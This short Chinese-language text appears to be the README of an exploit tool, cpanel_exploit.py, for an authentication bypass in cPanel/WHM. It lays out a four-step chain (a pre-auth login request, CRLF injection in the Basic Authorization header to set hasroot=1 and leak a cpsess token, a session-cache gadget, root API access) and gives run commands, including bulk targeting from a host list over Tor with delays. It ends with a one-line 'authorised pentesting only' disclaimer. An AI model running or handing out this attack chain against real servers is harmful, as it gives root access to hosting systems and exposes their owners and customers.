阶段 1:POST /login/?login_only=1 → 生成预认证会话
阶段 2:GET / Authorization:Basic <CRLF> → 注入 hasroot=1,泄露 cpsess 令牌
阶段 3:GET /scripts2/listaccts → 触发会话缓存传播小工具
阶段 4:GET /cpsess[TOKEN]/json-api/version → HTTP 200 + 版本 = ROOT 访问
pip install requests
python cpanel_exploit.py -t target.com
python cpanel_exploit.py -l whm_hosts.txt --tor --delay 2
python cpanel_exploit.py -t target.com --verify-only # 仅 CRLF 检查,不进行权限提升
仅限授权渗透测试使用。